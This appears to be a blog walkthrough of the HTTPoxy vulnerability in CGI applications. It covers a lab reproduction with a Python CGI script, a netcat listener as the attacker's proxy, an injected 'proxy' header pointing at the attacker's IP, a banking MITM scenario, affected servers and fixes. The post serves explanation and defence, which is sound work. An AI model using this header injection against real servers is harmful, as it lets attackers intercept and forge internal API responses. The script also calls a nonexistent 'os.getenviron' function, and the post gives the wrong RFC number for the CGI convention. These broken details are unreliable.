HTTPoxy vulnerability affecting CGI Applications

HTTPoxy

There’s this new vulnerability with a website [HTTPoxy.org] and a logo. Apart from the complete description that’s available at their official website I’m going to walk you through it and give you some practical examples of abuse cases. I’ve also developed a tool that you can run on your servers which tells you if you’re vulnerable or not.

What is HTTPoxy and how does it work?

HTTPoxy is the name of a vulnerability affecting CGI based applications. This can affect PHP, Go, Python, Perl, etc. Web servers running in a CGI or CGI-like context may assign client request Proxy header values to internal HTTP_PROXY environment variables. The vulnerable behavior is the result of a naming convention for meta-variables, defined in RFC 3876, which leads to a name collision: “The HTTP header field name is converted to upper case, has all occurrences of “-” replaced with “_” and has “HTTP_” prepended to give the meta-variable name.”

As mentioned above, the client supplied headers are placed into environment variables in CGI context in the form of HTTP_header. Hence if a client sets “proxy” header to an ip say 10.10.10.10 the CGI engine sets HTTP_PROXY env variable to that ip and any part of the script that uses this environment variable will be using 10.10.10.10 as its proxy giving the attacker the ability to MITM the traffic.

Remaking the scenario

In order to have have a better understanding of this vulnerability, I remade the scenario in my lab.

This is the scenario :

  1. We setup an apache web server under linux and wrote a simple python script to server as our CGI application.
  2. We started netcat listening on port 5555 somewhere on the internet to serve as attacker controlled proxy server.
  3. The attacker opens our CGI script at http://10.211.55.10/cgi-bin/test.py and uses tamper data to add the proxy header and sets it to the ip address of his proxy server: “proxy” : “http://[attackers ip]:5555
  4. The CGI script on the server happens to make a request to fetch a page and after setting this proxy its traffic is redirected to attackers server giving him the ability to MITM server’s request.

1. CGI Script

#!/usr/bin/python

import os, requests

print "Content-Type: text/html\r\n"
print "Testing HTTPoxy"

print os.getenviron("HTTP_PROXY")

response = requests.get("http://www.google.com") 
#www.google.com Could be some internal API fetching important information

2. NetCat as attacker’s proxy

Attacker runs nc -l -k 5555 to listen for connections from vulnerable web server.

3. Attacker using Tamper Data to add “proxy” header

proxy header

4. Attacker’s proxy intercepting webserver’s requests

netcat as proxy

How could this vulnerability actually be exploited?

Consider we have a financial application which gets the users’ requests for transactions, fetches their current balance via an internal http API and transfers the money if the balance is sufficient.

Now an attacker exploiting http_proxy vulnerability can take control of the requests going to that API, doing MITM and sending his response saying the balance is sufficient forcing his requested transactions to complete without enough money in his account.

Am I Vulnerable?

Some major affected software are:

  • Apache
  • NGINX/FastCGI
  • HAProxy
  • lighttpd
  • Microsoft IIS with PHP or CGI Framework (ASP/ASP.net Applications aren’t affected)
  • Lightspeed webserver

In order to fix this issue you’d have to use your webserver specific mitigations which basically remove or disable http_proxy headers and since they aren’t sent by the clients in normal scenario there won’t be side effects.

To find fixes search on your webservers website or use links provided at HTTPoxy.org.